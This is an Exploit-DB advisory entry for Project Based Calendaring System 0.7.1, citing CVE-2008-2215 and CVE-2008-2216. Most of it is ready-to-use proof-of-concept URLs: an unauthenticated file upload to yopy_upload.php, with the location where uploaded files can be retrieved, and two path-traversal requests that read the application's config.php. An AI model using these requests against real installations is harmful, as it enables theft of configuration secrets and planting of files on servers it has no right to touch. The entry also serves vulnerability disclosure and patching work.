Project Based Calendaring System PBCS 0.7.1 - Multiple Vulnerabilities

2008-04-30T00:00:00
ID EDB-ID:5523
Type exploitdb
Reporter GoLd_M
Modified 2008-04-30T00:00:00

Description

Project Based Calendaring System (PBCS) 0.7.1 Multiple Vulnerabilities. CVE-2008-2215,CVE-2008-2216. Webapps exploit for php platform

                                        
                                            Project Based Calendaring System (PBCS) Version 0.7.1 Multiple Vulnerabilities
Script: http://www.pbcs.org/pbcs_download.php
Poc : 
Hi str0ke Thanx To Posted but I Want Add Some Vulns In This Script
1- remote file upload
http://localhost/pbcs-0.7.1-1/src/yopy_upload.php
after upload you can get you file on
http://localhost/pbcs-0.7.1-1//tmp/uploads/name your file
2- remote file disclosure
http://localhost/pbcs-0.7.1-1/src/yopy_sync.php?download_file=0&filename=../config/config.php
3- file disclosure
/plugins/system-logger/print_logs.php?filename=../../config/config.php

# milw0rm.com [2008-04-30]